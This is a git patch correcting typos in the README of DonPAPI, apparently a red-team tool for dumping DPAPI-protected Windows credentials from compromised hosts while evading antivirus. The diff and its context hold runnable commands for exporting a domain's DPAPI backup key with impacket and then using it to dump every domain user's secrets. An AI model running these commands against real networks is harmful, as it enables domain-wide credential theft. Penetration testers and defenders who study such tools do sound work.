From 01ad18dcf126e543e773e5863d8832de39f4312e Mon Sep 17 00:00:00 2001
From: Login Securite <33292306+login-securite@users.noreply.github.com>
Date: Thu, 18 Nov 2021 10:59:43 +0100
Subject: [PATCH] Fixing typos

---
 readme.md | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/readme.md b/readme.md
index d7fc998..b0277ce 100644
--- a/readme.md
+++ b/readme.md
@@ -6,7 +6,7 @@ Dumping revelant information on compromised targets without AV detection
 ## DPAPI dumping
 Lots of credentials are protected by [DPAPI](https://docs.microsoft.com/en-us/dotnet/standard/security/how-to-use-data-protection).
 
-We aim at locating those "secured" credentials, and retreive them using :
+We aim at locating those "secured" credentials, and retrieve them using :
 - User password
 - Domaine DPAPI BackupKey
 - Local machine DPAPI Key (protecting `TaskScheduled` blob)
@@ -84,10 +84,10 @@ DonPAPI.py -credz credz_file.txt domain/user:passw0rd@target
 When a domain admin user is available, it is possible to dump the domain backup key using impacket `dpapi.py` tool. 
 
 ```bash
-dpapi.py backupkey --export
+dpapi.py backupkeys --export -t domain/user:passw0rd@target_dc_ip
 ```
 
-This backup key can then be used to dump all domain user's secrets!
+This backup key (pvk file) can then be used to dump all domain user's secrets!
 
 `python DonPAPI.py -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list`